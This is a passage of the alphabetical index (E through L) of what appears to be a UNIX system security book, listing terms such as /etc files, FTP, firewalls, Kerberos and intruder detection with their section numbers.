/etc/shells file : 8.4.2. Changing the Account's Login Shell<br />

/etc/syslogd : (see syslog facility)<br />

/etc/tty file, backing up : 7.1.2. What Should You Back Up?<br />

/etc/ttys file<br />

8.5.1. <strong>Sec</strong>ure Terminals<br />

14.5.1. Hooking Up a Modem to Your Computer<br />

/etc/ttytab file : C.5.1. Process #1: /etc/init<br />

/etc/utmp file<br />

10.1.2. utmp and wtmp Files<br />

10.1.2.1. su command and /etc/utmp and /var/adm/wtmp files<br />

24.2.1. Catching One in the Act<br />

24.2.4. Tracing a Connection<br />

/etc/uucp directory : 15.4.2.1. Some bad examples<br />

/etc/yp/makedbm program : 19.4.4.1. Setting up netgroups<br />

in restricted filesystems : 8.1.5. Restricted Filesystem<br />

Ethernet : 16.1. Networking<br />

addresses for random seeds : 23.8. Picking a Random Seed<br />

cables : (see cables, network)<br />

eavesdropping by : 12.3.1.2. Eavesdropping by Ethernet and 10Base-T<br />

Ethers table (NIS+) : 19.5.3. NIS+ Tables<br />

Euler Totient Function : 6.4.6.1. How RSA works<br />

eval function<br />

18.2.3.2. Testing is not enough!<br />

18.2.3.3. Sending mail<br />

evidence, equipment seized as : 26.2.4. Hazards of Criminal Prosecution<br />

ex editor<br />

5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

11.5.2.4. .exrc<br />

11.5.2.7. Other initializations<br />

exceptions : C.2. Creating Processes<br />

exclamation mark (!) and mail command : 15.1.3. mail Command<br />

exclusive OR (XOR) : 6.4.7. An Unbreakable Encryption Algorithm<br />

exec (in Swatch program) : 10.6.2. The Swatch Configuration File<br />

exec system call<br />

5.1.7. File Permissions in Detail<br />

18.2.3.3. Sending mail<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

25.2.1.1. Too many processes<br />

ExecCGI option : 18.3.2. Commands Within the Block<br />

execl system call : 23.4. Tips on Writing SUID/SGID Programs<br />

execlp system call : 23.4. Tips on Writing SUID/SGID Programs<br />

execute permission<br />

5.1.7. File Permissions in Detail<br />

5.4. Using Directory Permissions<br />

execv system call : 23.4. Tips on Writing SUID/SGID Programs<br />

execve system call : 23.4. Tips on Writing SUID/SGID Programs<br />

execvp system call : 23.4. Tips on Writing SUID/SGID Programs<br />

expiring<br />

accounts : 8.4.3. Finding Dormant Accounts<br />

FTP depositories : 17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

passwords : 8.8.6. Password Aging and Expiration<br />

explosions : 12.2.1.5. Explosion<br />

export laws : 26.4.1. Munitions Export<br />

cryptography<br />

6.4.4.1. Use and export of DES<br />

6.7.2. Cryptography and Export Controls<br />

exportfs command : 20.2.1.2. /usr/etc/exportfs<br />

exports file<br />

11.6.1.2. Writable system files and directories<br />

19.3.2.4. Using <strong>Sec</strong>ure NFS<br />

20.2.1.1. /etc/exports<br />

20.2.1.2. /usr/etc/exportfs<br />

.exrc file : 11.5.2.4. .exrc<br />

ext2 filesystem (Linux) : 25.2.2.6. Reserved space<br />

external data representation (XDR) : 19.2. Sun's Remote Procedure Call (RPC)<br />

extinguishers, fire : (see fires)<br />

extortion : 11.3. Authors<br />

Index: F<br />

factoring numbers<br />

6.4.6. RSA and Public Key Cryptography<br />

6.4.6.3. Strength of RSA<br />

(see also RSA algorithm)<br />

failed login attempts : (see logging in)<br />

failures, computer<br />

7.1.1.1. A taxonomy of computer failures<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

(see also bugs)<br />

fair use laws : 26.4.2. Copyright Infringement<br />

Fast Filesystem (FFS) : 25.2.2.6. Reserved space<br />

FBI (Federal Bureau of Investigation)<br />

26.2.2. Federal Jurisdiction<br />

F.3.2. Federal Bureau of Investigation (FBI)<br />

fbtab file : 17.3.21.1. /etc/fbtab and /etc/logindevperm<br />

Federal Information Processing Standard (FIPS) : 6.4.2. Summary of Public Key Systems<br />

federal law enforcement<br />

26.2.2. Federal Jurisdiction<br />

26.2.3. Federal Computer Crime Laws<br />

FFS (Fast File System) : 25.2.2.6. Reserved space<br />

fgets function : 23.1.1. The Lesson of the <strong>Internet</strong> Worm<br />

fiber optic cables : (see cables, network)<br />

File Handles : 20.1.2. File Handles<br />

File Transfer Protocol : (see FTP)<br />

filenames, attacks via : 11.5.1.4. Filename attacks<br />

files : 5.1. Files<br />

automatic directory listings : 18.2.2.2. Additional configuration issues<br />

backing up<br />

7. Backups<br />

7.4.7. inode Modification Times<br />

automatic system for<br />

7.3.2. Building an Automatic Backup System<br />

18.2.3.5. Beware stray CGI scripts<br />

critical files<br />

7.3. Backing Up System Files<br />

7.3.2. Building an Automatic Backup System<br />

prioritizing : 7.3.1. What Files to Back Up?<br />

changing owner of : 5.7. chown: Changing a File's Owner<br />

context-dependent (CDFs)<br />

5.9.2. Context-Dependent Files<br />

24.4.1.7. Hidden files and directories<br />

core : C.4. The kill Command<br />

descriptors : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

detecting changes to<br />

9.2. Detecting Change<br />

9.3. A Final Note<br />

device : 5.6. Device Files<br />

downloading, logs of<br />

10.3.3. xferlog Log File<br />

10.3.5. access_log Log File<br />

finding all SUID/SGID<br />

5.5.4. Finding All of the SUID and SGID Files<br />

5.5.4.1. The ncheck command<br />

format, monitoring : 8.2. Monitoring File Format<br />

group-writable : 11.6.1.2. Writable system files and directories<br />

hidden : 24.4.1.7. Hidden files and directories<br />

hidden space : 25.2.2.7. Hidden space<br />

history : 10.4.1. Shell History<br />

immutable : 9.1.1. Immutable and Append-Only Files<br />

integrity of : (see integrity)<br />

intruder's changes to : 24.4.1.1. Changes in file contents<br />

locating largest : 25.2.2.1. Disk-full attacks<br />

locking : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

log : (see log files)<br />

mail sent directly to : 15.7. Early <strong>Sec</strong>urity Problems with UUCP<br />

modification times of<br />

5.1.2. Inodes<br />

5.1.5. File Times<br />

7.4.7. inode Modification Times<br />

9.2.2. Checklists and Metadata<br />

network configuration : 10.4.3. Network Setup<br />

permissions to : (see permissions)<br />

remote access to<br />

15.4.1. USERFILE: Providing Remote File Access<br />

15.4.2.1. Some bad examples<br />

SGID bit on : 5.5.7. SGID Bit on Files (System V <strong>UNIX</strong> Only): Mandatory Record Locking<br />

startup<br />

11.5.2. Start-up File Attacks<br />

11.5.2.7. Other initializations<br />

system database : 1.2. What Is an Operating System?<br />

transfering between systems : 15.1.1. uucp Command<br />

types of : 5.1.6. Understanding File Permissions<br />

unowned : 24.4.1.8. Unowned files<br />

on Web servers : (see Web servers)<br />

world-writable : 11.6.1.1. World-writable user files and directories<br />

zero-filled bytes in : 7.4. Software for Backups<br />

filesystems : (see directories)<br />

filter files (mail) : 11.5.2.5. .forward, .procmailrc<br />

filters, air : 12.2.1.3. Dust<br />

find command<br />

5.5.4. Finding All of the SUID and SGID Files<br />

11.5.1.4. Filename attacks<br />

-H option : 5.9.2. Context-Dependent Files<br />

-ls option : 9.2.2.1. Simple listing<br />

-size option : 25.2.2.1. Disk-full attacks<br />

-H option : 24.4.1.7. Hidden files and directories<br />

-print option : 5.5.4. Finding All of the SUID and SGID Files<br />

type -f option : 5.5.4. Finding All of the SUID and SGID Files<br />

-xdev option : 5.5.4. Finding All of the SUID and SGID Files<br />

finger command<br />

8.1.3. Accounts That Run a Single Command<br />

10.1.1. lastlog File<br />

10.1.2. utmp and wtmp Files<br />

15.3.1. Assigning Additional UUCP Logins<br />

15.4.3. L.cmds: Providing Remote Command Execution<br />

17.3.4.3. Improving the security of Berkeley sendmail V8<br />

17.3.8. finger (TCP Port 79)<br />

17.3.8.3. Replacing finger<br />

21.4.4.1. Creating an ftpout account to allow FTP without proxies.<br />

23.1.1. The Lesson of the <strong>Internet</strong> Worm<br />

24.2.1. Catching One in the Act<br />

24.2.4.2. How to contact the system administrator of a computer you don't know<br />

(see also <strong>Internet</strong>, Worm program)<br />

disabling : 17.3.8.2. Disabling finger<br />

FIPS (Federal Information Processing Standard) : 6.4.2. Summary of Public Key Systems<br />

fired employees : 13.2.6. Departure<br />

fires<br />

12.2.1.1. Fire<br />

12.2.1.2. Smoke<br />

12.4.1.1. Fire hazards<br />

extinguishers and radio transmitters : 12.2.1.8. Electrical noise<br />

firewalls<br />

8.8.9. Account Names Revisited: Using Aliases for Increased <strong>Sec</strong>urity<br />

17.2. Controlling Access to Servers<br />

21. Firewalls<br />

21.4.2. Electronic Mail<br />

21.5. Special Considerations<br />

checklist for : A.1.1.20. Chapter 21: Firewalls<br />

mailing list for<br />

E.1.3.1. Academic-Firewalls<br />

E.1.3.7. Firewalls<br />

nameservers and : 17.3.6.2. DNS nameserver attacks<br />

for NIS sites : 19.4.5. Unintended Disclosure of Site Information with NIS<br />

portmapper program and : 19.2.1. Sun's portmap/rpcbind<br />

for specific network services : G. Table of IP Services<br />

FIRST teams<br />

24.6. Resuming Operation<br />

E.3.3. FIRST<br />

Fitzgerald, Tom : 22.5. UDP Relayer<br />

flooding<br />

client : 16.3.2. <strong>Sec</strong>urity and Nameservice<br />

messages : 25.3.2. Message Flooding<br />

servers with requests : 25.3.1. Service Overloading<br />

water : (see water)<br />

floors, raised : 12.2.3.1. Raised floors and dropped ceilings<br />

floppy disks : (see backups; media)<br />

folders : (see directories)<br />

FollowSymLinks option : 18.3.2. Commands Within the Block<br />

food : 12.2.2.1. Food and drink<br />

fork command<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

25.2.1.1. Too many processes<br />

C.2. Creating Processes<br />

format<br />

file, monitoring : 8.2. Monitoring File Format<br />

redoing as destructive attack : 25.1. Destructive Attacks<br />

USERFILE entries : 15.4.1.3. Format of USERFILE entry without system name<br />

.forward file<br />

11.5.2.5. .forward, .procmailrc<br />

21.4.2. Electronic Mail<br />

24.4.1.6. Changes to startup files<br />

Frame Ground (FG) : 14.3. The RS-232 Serial Protocol<br />

fraud<br />

14.4.1. One-Way Phone Lines<br />

26.2.2. Federal Jurisdiction<br />

fscanf function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

fsck program<br />

24.4.1.7. Hidden files and directories<br />

25.2.2.8. Tree-structure attacks<br />

fsirand command : 20.4.8. Use fsirand<br />

fstab file<br />

11.1.2. Back Doors and Trap Doors<br />

19.3.2.5. Mounting a secure filesystem<br />

FTP (File Transfer Protocol)<br />

17.3.2. (FTP) File Transfer Protocol (TCP Ports 20 and 21)<br />

17.3.2.7. Allowing only FTP access<br />

anonymous<br />

4.1. Users and Groups<br />

17.3.2.1. Using anonymous FTP<br />

17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

and HTTP : 18.2.4.1. Beware mixing HTTP with anonymous FTP<br />

~ftp/bin directory : 17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

~ftp/etc directory : 17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

~ftp/pub directory : 17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

logging transferred files : 10.3.3. xferlog Log File<br />

passive mode<br />

17.3.2.2. Passive vs. active FTP<br />

17.3.2.3. FTP passive mode<br />

setting up server<br />

17.3.2.4. Setting up an FTP server<br />

17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

ftp account : (see anonymous FTP)<br />

ftpd server<br />

8.4.2. Changing the Account's Login Shell<br />

11.1.2. Back Doors and Trap Doors<br />

17.3.2. (FTP) File Transfer Protocol (TCP Ports 20 and 21)<br />

17.3.2.4. Setting up an FTP server<br />

for backups : 7.4.5. Backups Across the Net<br />

security hole : 6.5.2. Using Message Digests<br />

UUCP enabled on : 15.8. UUCP Over Networks<br />

ftpout account, firewalls : 21.4.4.1. Creating an ftpout account to allow FTP without proxies.<br />

ftpusers file : 17.3.2.5. Restricting FTP with the standard <strong>UNIX</strong> FTP server<br />

ftruncate system call : 5.1.7. File Permissions in Detail<br />

full backups : 7.1.3. Types of Backups<br />

function keys : 12.3.4.5. Function keys<br />

functionality, add-on : 1.4.3. Add-On Functionality Breeds Problems<br />

Index: G<br />

games<br />

8.1.4. Open Accounts<br />

17.3.23. Other TCP Ports: MUDs and <strong>Internet</strong> Relay Chat (IRC)<br />

gas, natural : 12.2.1.5. Explosion<br />

gated daemon : 17.3.19. Routing <strong>Internet</strong> Protocol (RIP routed) (UDP Port 520)<br />

gateways : 16.2.2. Routing<br />

gcore program : C.4. The kill Command<br />

GCT tool : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

gdb debugger : C.4. The kill Command<br />

GECOS (or GCOS) : 3.2.1. The /etc/passwd File<br />

Geer, Dan : 27.2.6. Network Providers that Network Too Well<br />

General Electric Company : F.3.4.13. General Electric<br />

generating<br />

passwords automatically : 8.8.4. Password Generators<br />

random numbers : 23.6. Tips on Generating Random Numbers<br />

German government institutions : F.3.4.25. Netherlands: SURFnet-connected sites<br />

gethostbyaddr function : 16.2.6.1. DNS under <strong>UNIX</strong><br />

gethostbyname function : 16.2.6.1. DNS under <strong>UNIX</strong><br />

getopt function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

getpass function<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

23.5. Tips on Using Passwords<br />

getpwuid function : 19.4.1. Including or excluding specific accounts:<br />

gets function : 23.1.1. The Lesson of the <strong>Internet</strong> Worm<br />

getservicebyname function : 17.1.1. The /etc/services File<br />

getstats program : 10.3.5. access_log Log File<br />

getty program : C.5.2. Logging In<br />

GIDs (group identifiers)<br />

1.4.3. Add-On Functionality Breeds Problems<br />

4.1.3. Groups and Group Identifiers (GIDs)<br />

4.1.3.3. Groups and BSD or SVR4 <strong>UNIX</strong><br />

real versus effective : 4.3.1. Real and Effective UIDs<br />

GIP RENATER : F.3.4.12. France: universities, Ministry of Research and Education in France, CNRS, CEA, INRIA, CNES, INRA, IFREMER, and EDF<br />

glass walls : 12.2.3.3. Glass walls<br />

GNU Emacs : 11.5.2.3. GNU .emacs<br />

GNU utilities : 23.1.2.1. What they found<br />

Goldman, Sachs, and Company : F.3.4.38. U.K. JANET network<br />

granularity, time : 23.8. Picking a Random Seed<br />

grounding signals : 25.3.3. Signal Grounding<br />

group disk quotas : 25.2.2.5. Using quotas<br />

group file<br />

1.2. What Is an Operating System?<br />

4.1.3.1. The /etc/group file<br />

4.2.3. Impact of the /etc/passwd and /etc/group Files on <strong>Sec</strong>urity<br />

8.1.6. Group Accounts<br />

group IDs : (see GIDs)<br />

Group table (NIS+) : 19.5.3. NIS+ Tables<br />

groups<br />

4.1.3. Groups and Group Identifiers (GIDs)<br />

4.1.3.3. Groups and BSD or SVR4 <strong>UNIX</strong><br />

accounts for : 8.1.6. Group Accounts<br />

changing : 5.8. chgrp: Changing a File's Group<br />

checklist for : A.1.1.3. Chapter 4: Users, Groups, and the Superuser<br />

files writable by : 11.6.1.2. Writable system files and directories<br />

identifiers for : (see GIDs)<br />

NIS netgroups<br />

19.4.4. NIS Netgroups<br />

19.4.4.6. NIS is confused about "+"<br />

umask for group projects : 5.3.1. The umask Command<br />

wheel : (see wheel group)<br />

grpck command : 8.2. Monitoring File Format<br />

guessing passwords : (see cracking, passwords)<br />

guest accounts<br />

4.1. Users and Groups<br />

8.1.4. Open Accounts<br />

8.1.4.6. Potential problems with rsh<br />

8.8.7. Algorithm and Library Changes<br />

Index: H<br />

hacker challenges : 27.2.4. Hacker Challenges<br />

hackers : 1. Introduction<br />

Haley, Chuck : 1.3. History of <strong>UNIX</strong><br />

Halon fire extinguishers : 12.2.1.1. Fire<br />

and radio transmitters : 12.2.1.8. Electrical noise<br />

halt command : 24.2.6. Anatomy of a Break-in<br />

hanging up modem : (see signals)<br />

harassment : 26.4.7. Harassment, Threatening Communication, and Defamation<br />

hard copy : (see paper)<br />

hard disks : (see media)<br />

hardcopy device, logging to : 10.5.2.1. Logging to a printer<br />

hardware<br />

bugs in : 27.2.1. Hardware Bugs<br />

failure of : 7.1.1.1. A taxonomy of computer failures<br />

food and drink threats : 12.2.2.1. Food and drink<br />

modems<br />

14. Telephone <strong>Sec</strong>urity<br />

14.6. Additional <strong>Sec</strong>urity for Modems<br />

physical security of<br />

12.2. Protecting Computer Hardware<br />

12.2.7. Related Concerns<br />

read-only filesystems : 9.1.2. Read-only Filesystems<br />

seized as evidence : 26.2.4. Hazards of Criminal Prosecution<br />

hash functions : 6.5.1. Message Digests<br />

hash mark (#), disabling services with : 17.3. Primary <strong>UNIX</strong> Network Services<br />

HAVAL algorithm<br />

6.5.4.3. HAVAL<br />

23.9. A Good Random Seed Generator<br />

HDB UUCP : 15.2. Versions of UUCP<br />

header, packet : 16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

heat, extreme : 12.2.1.6. Temperature extremes<br />

Hellman, Martin : 6.4.5.1. Double DES<br />

Hellman-Merkle : 18.6. Dependence on Third Parties<br />

Hewlett-Packard (HP) : F.3.4.17. Hewlett-Packard customers<br />

hidden<br />

data, in CGI scripts : 18.2.3.1. Do not trust the user's browser!<br />

files, created by intruders : 24.4.1.7. Hidden files and directories<br />

space : 25.2.2.7. Hidden space<br />

hijacking Telnet sessions : 17.3.3. TELNET (TCP Port 23)<br />

history file (csh)<br />

10.4.1. Shell History<br />

15.1.1.1. uucp with the C shell<br />

hit lists of passwords : 3.6.1. Bad Passwords: Open Doors<br />

holes, security : (see security holes)<br />

HOME variable, attacks via : 11.5.1.3. $HOME attacks<br />

HoneyDanBer (HDB) UUCP : 15.2. Versions of UUCP<br />

Honeyman, Peter : 15.2. Versions of UUCP<br />

hostnames<br />

16.2.3. Hostnames<br />

hosts<br />

16.2.3.1. The /etc/hosts file<br />

controlling access to : 17.2. Controlling Access to Servers<br />

name service and<br />

16.2.6. Name Service<br />

16.2.6.2. Other naming services<br />

NID passwords for : 19.3.2.2. Creating passwords for hosts<br />

trusted : (see trusted, hosts)<br />

hosts file : 16.2.3.1. The /etc/hosts file<br />

hosts.equiv file<br />

17.3.18.4. The ~/.rhosts file<br />

17.3.18.6. /etc/hosts.lpd file<br />

24.4.1.5. Changes to the /etc/hosts.equiv file<br />

hosts.lpd file : 17.3.18.6. /etc/hosts.lpd file<br />

HP (Hewlett-Packard) : F.3.4.17. Hewlett-Packard customers<br />

HP-UX<br />

access control lists : 5.2.5.2. HP-UX access control lists<br />

context-dependent files : 5.9.2. Context-Dependent Files<br />

.htaccess file : 18.3.1. The access.conf and .htaccess Files<br />

HTML documents<br />

controlling access to<br />

18.3. Controlling Access to Files on Your Server<br />

18.3.3. Setting Up Web Users and Passwords<br />

encrypting : 18.4.1. Eavesdropping Over the Wire<br />

server-side includes<br />

18.2.2.2. Additional configuration issues<br />

18.3.2. Commands Within the Block<br />

htpasswd program : 18.3.3. Setting Up Web Users and Passwords<br />

HTTP (Hypertext Transfer Protocol) : 17.3.9. HyperText Transfer Protocol (HTTP) (TCP Port 80)<br />

and anonymous FTP : 18.2.4.1. Beware mixing HTTP with anonymous FTP<br />

logging downloaded files : 10.3.5. access_log Log File<br />

<strong>Sec</strong>ure : (see <strong>Sec</strong>ure HTTP)<br />

http server<br />

group file : 18.3.2. Commands Within the Block<br />

log files of : 18.4.2. Eavesdropping Through Log Files<br />

password file : 18.3.2. Commands Within the Block<br />

httpd.conf file : 18.2.1. The Server's UID<br />

human error and backups : 7.1.4. Guarding Against Media Failure<br />

humidity : 12.2.1.11. Humidity<br />

hypertext links, encrypting : 18.4.1. Eavesdropping Over the Wire<br />

Hypertext Transfer Protocol : (see HTTP)<br />

Index: I<br />

I/O : (see input/output)<br />

ICMP (<strong>Internet</strong> Control Message Protocol) : 16.2.4.1. ICMP<br />

IDEA (International Data Encryption Algorithm)<br />

6.4.1. Summary of Private Key Systems<br />

6.6.3.1. Encrypting files with IDEA<br />

identd daemon : 17.3.12. Identification Protocol (auth) (TCP Port 113)<br />

identification protocol : 17.3.12. Identification Protocol (auth) (TCP Port 113)<br />

identifiers : 3.1. Usernames<br />

IEEE Computer Society : F.1.7. IEEE Computer Society<br />

IFS variable<br />

5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

23.4. Tips on Writing SUID/SGID Programs<br />

attacks via : 11.5.1.2. IFS attacks<br />

ignore (in Swatch command) : 10.6.2. The Swatch Configuration File<br />

immutable files : 9.1.1. Immutable and Append-Only Files<br />

importing NIS accounts<br />

19.4.1. Including or excluding specific accounts:<br />

19.4.4.2. Using netgroups to limit the importing of accounts<br />

in.named daemon : 16.2.6.1. DNS under <strong>UNIX</strong><br />

includes : (see server-side includes)<br />

Includes option : 18.3.2. Commands Within the Block<br />

IncludesNoExec option : 18.3.2. Commands Within the Block<br />

incremental backups : 7.1.3. Types of Backups<br />

indecent material : 26.4.5. Pornography and Indecent Material<br />

index.html file, absence of : 18.2.2.2. Additional configuration issues<br />

inetd daemon<br />

17.1.2. Starting the Servers<br />

17.1.3. The /etc/inetd Program<br />

-nowait option : 25.3.1. Service Overloading<br />

-t (trace) option : 10.3.6. Logging Network Services<br />

denial-of-service attacks : 17.1.3. The /etc/inetd Program<br />

inetd.conf file<br />

11.5.3.2. inetd.conf<br />

17.3. Primary <strong>UNIX</strong> Network Services<br />

information : (see data)<br />

init program<br />

5.3.2. Common umask Values<br />

C.5.1. Process #1: /etc/init<br />

initialization vector (IV) : 6.4.4.2. DES modes<br />

initializing<br />

environment variables : 11.5.2.7. Other initializations<br />

system, files for : 11.5.3.5. System initialization files<br />

inittab program<br />

14.5.1. Hooking Up a Modem to Your Computer<br />

C.5.1. Process #1: /etc/init<br />

INND program : 17.3.13. Network News Transport Protocol (NNTP) (TCP Port 119)<br />

inodes<br />

5.1. Files<br />

5.1.2. Inodes<br />

change time : (see ctime)<br />

for device files : 5.6. Device Files<br />

problems with : 25.2.2.3. Inode problems<br />

input/output (I/O)<br />

checking for meta characters : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

portable library : 1.3. History of <strong>UNIX</strong><br />

insects : 12.2.1.7. Bugs (biological)<br />

installing<br />

cables : 12.2.4.2. Network cables<br />

Kerberos : 19.6.3. Installing Kerberos<br />

logging installations : 10.7.2.1. Exception and activity reports<br />

physical security plan for : 12.1.1. The Physical <strong>Sec</strong>urity Plan<br />

insurance<br />

26.1. Legal Options After a Break-in<br />

26.2.6. Other Tips<br />

integrity<br />

2.1. Planning Your <strong>Sec</strong>urity Needs<br />

9. Integrity Management<br />

9.3. A Final Note<br />

11.1.5. Viruses<br />

12.3. Protecting Data<br />

12.3.6. Key Switches<br />

Kerberos : 19.6.1.3. Authentication, data integrity, and secrecy<br />

management checklist : A.1.1.8. Chapter 9: Integrity Management<br />

<strong>Sec</strong>ure RPC : 19.3.4. Limitations of <strong>Sec</strong>ure RPC<br />

software for checking : 19.5.5. NIS+ Limitations<br />

international cryptography export<br />

6.4.4.1. Use and export of DES<br />

6.7.2. Cryptography and Export Controls<br />

International Data Encryption Algorithm (IDEA)<br />

6.4.1. Summary of Private Key Systems<br />

6.6.3.1. Encrypting files with IDEA<br />

<strong>Internet</strong><br />

16.1.1. The <strong>Internet</strong><br />

18. WWW <strong>Sec</strong>urity<br />

(see also World Wide Web)<br />

addresses<br />

16.2.1. <strong>Internet</strong> Addresses<br />

16.2.1.3. CIDR addresses<br />

daemon : (see inetd daemon)<br />

domain as NIS domain : 19.4.3. NIS Domains<br />

firewalls : (see firewalls)<br />

servers : (see servers, <strong>Internet</strong>)<br />

Worm program : 1. Introduction<br />

Worm program : 23.1.1. The Lesson of the <strong>Internet</strong> Worm<br />

<strong>Internet</strong> Control Message Protocol (ICMP) : 16.2.4.1. ICMP<br />

<strong>Internet</strong> Packet Exchange (IPX) : 16.4.1. IPX<br />

<strong>Internet</strong> Relay Chat (IRC) : 17.3.23. Other TCP Ports: MUDs and <strong>Internet</strong> Relay Chat (IRC)<br />

<strong>Internet</strong> <strong>Sec</strong>urity Scanner (ISS) : 17.6.2. ISS<br />

intruders : 1. Introduction<br />

confronting : 24.2.2. What to Do When You Catch Somebody<br />

creating hidden files : 24.4.1.7. Hidden files and directories<br />

discovering<br />

24.2. Discovering an Intruder<br />

24.2.6. Anatomy of a Break-in<br />

legal options regarding : 26.1. Legal Options After a Break-in<br />

responding to<br />

24. Discovering a Break-in<br />

24.7. Damage Control<br />

tracking from log files : 24.3. The Log Files: Discovering an Intruder's Tracks<br />

ioctl system call : C.1.3.4. Process groups and sessions<br />

IP addresses<br />

controlling access by : 17.2. Controlling Access to Servers<br />

name service and<br />

16.2.6. Name Service<br />

16.2.6.2. Other naming services<br />

restricting access by : 18.3. Controlling Access to Files on Your Server<br />

IP numbers, monitoring : 12.3.1.2. Eavesdropping by Ethernet and 10Base-T<br />

IP packets<br />

16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

16.2.4. Packets and Protocols<br />

16.2.4.3. UDP<br />

eavesdropping : 16.3.1. Link-level <strong>Sec</strong>urity<br />

monitoring : 12.3.1.2. Eavesdropping by Ethernet and 10Base-T<br />

sniffing<br />

16.3.1. Link-level <strong>Sec</strong>urity<br />

17.3.3. TELNET (TCP Port 23)<br />

IP protocols<br />

1.4.3. Add-On Functionality Breeds Problems<br />

16.2.4. Packets and Protocols<br />

16.2.4.3. UDP<br />

IP security<br />

16.3. IP <strong>Sec</strong>urity<br />

16.3.3. Authentication<br />

IP services : (see network services)<br />

IP spoofing<br />

1.4.3. Add-On Functionality Breeds Problems<br />

16.3. IP <strong>Sec</strong>urity<br />

IPv4 (IP Version 4)<br />

16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

16.2.6.2. Other naming services<br />

IPX (<strong>Internet</strong> Packet Exchange) : 16.4.1. IPX<br />

IRC (<strong>Internet</strong> Relay Chat) : 17.3.23. Other TCP Ports: MUDs and <strong>Internet</strong> Relay Chat (IRC)<br />

IRIX wtmpx file : 10.1.2. utmp and wtmp Files<br />

ISS (<strong>Internet</strong> <strong>Sec</strong>urity Scanner)<br />

17.6.2. ISS<br />

E.4.4. ISS (<strong>Internet</strong> <strong>Sec</strong>urity Scanner)<br />

Index: J<br />

Java programming language<br />

11.1.5. Viruses<br />

18.5.1. Executing Code from the Net<br />

Joe accounts<br />

3.6.2. Smoking Joes<br />

8.8.3.1. Joetest: a simple password cracker<br />

Joy, Bill : 1.3. History of <strong>UNIX</strong><br />

JP Morgan : F.3.4.18. JP Morgan employees and customers<br />

Index: K<br />

Karn, Phil : 6.6.2. des: The Data Encryption Standard<br />

Kerberos system<br />

8.7.3. Code Books<br />

19.6. Kerberos<br />

19.6.5. Kerberos Limitations<br />

E.4.5. Kerberos<br />

installing : 19.6.3. Installing Kerberos<br />

RPC system and : 19.2.2.4. AUTH_KERB<br />

Versions 4 and 5 : 19.6.1.4. Kerberos 4 vs. Kerberos 5<br />

versus <strong>Sec</strong>ure RPC : 19.6.2. Kerberos vs. <strong>Sec</strong>ure RPC<br />

kermit program<br />

14.5. Modems and <strong>UNIX</strong><br />

14.5.3.3. Privilege testing<br />

kernel<br />

1.2. What Is an Operating System?<br />

key<br />

5.5.3. SUID Shell Scripts<br />

escrow : 6.1.3. Modern Controversy<br />

fingerprints : 6.6.3.6. PGP detached signatures<br />

search<br />

6.2.3. Cryptographic Strength<br />

8.6.1. The crypt() Algorithm<br />

switches : 12.3.6. Key Switches<br />

keylogin program<br />

19.3.3. Using <strong>Sec</strong>ure RPC<br />

19.5.4. Using NIS+<br />

keylogout program : 19.3.3. Using <strong>Sec</strong>ure RPC<br />

keyserv process<br />

19.3.1.1. Proving your identity<br />

19.3.2.3. Making sure <strong>Sec</strong>ure RPC programs are running on every workstation<br />

19.5.4. Using NIS+<br />

keystore file : 19.3.1.1. Proving your identity<br />

keystrokes<br />

monitoring<br />

17.3.21.2. X security<br />

24.2.3. Monitoring the Intruder<br />

(see also sniffers)<br />

time between : 23.8. Picking a Random Seed<br />

kill command<br />

17.3.4.2. Using sendmail to receive email<br />

24.2.5. Getting Rid of the Intruder<br />

C.4. The kill Command<br />

to stop process overload<br />

25.2.1.1. Too many processes<br />

25.2.1.2. System overload attacks<br />

kinit program : 19.6.4. Using Kerberos<br />

kmem device<br />

5.6. Device Files<br />

11.1.2. Back Doors and Trap Doors<br />

known text attacks : 6.2.3. Cryptographic Strength<br />

Koblas, David : 22.4. SOCKS<br />

Koblas, Michelle : 22.4. SOCKS<br />

ksh (Korn shell)<br />

11.5.1. Shell Features<br />

24.4.1.7. Hidden files and directories<br />

C.5.3. Running the User's Shell<br />

(see also shells)<br />

history file : 10.4.1. Shell History<br />

restricted shell : 8.1.4.3. Restricted Korn shell<br />

TMOUT variable : 12.3.5.1. Built-in shell autologout<br />

umask and : 5.3.1. The umask Command<br />

ksh93 shell<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

24.4.1.7. Hidden files and directories<br />

.kshrc file : 11.5.2.2. .cshrc, .kshrc<br />

Index: L<br />

L-devices file : 14.5.1. Hooking Up a Modem to Your Computer<br />

L.cmds file : 15.4.3. L.cmds: Providing Remote Command Execution<br />

L.sys file : 15.3.3. <strong>Sec</strong>urity of L.sys and Systems Files<br />

Lai, Xuejia : 6.4.1. Summary of Private Key Systems<br />

laid-off employees : 13.2.6. Departure<br />

LaMacchia, Brian : 19.3.4. Limitations of <strong>Sec</strong>ure RPC<br />

LANs (local area networks)<br />

16.1. Networking<br />

16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

laptop computers : 12.2.6.3. Portables<br />

last program<br />

8.4.3. Finding Dormant Accounts<br />

10.1.2. utmp and wtmp Files<br />

10.1.3. last Program<br />

10.1.3.1. Pruning the wtmp file<br />

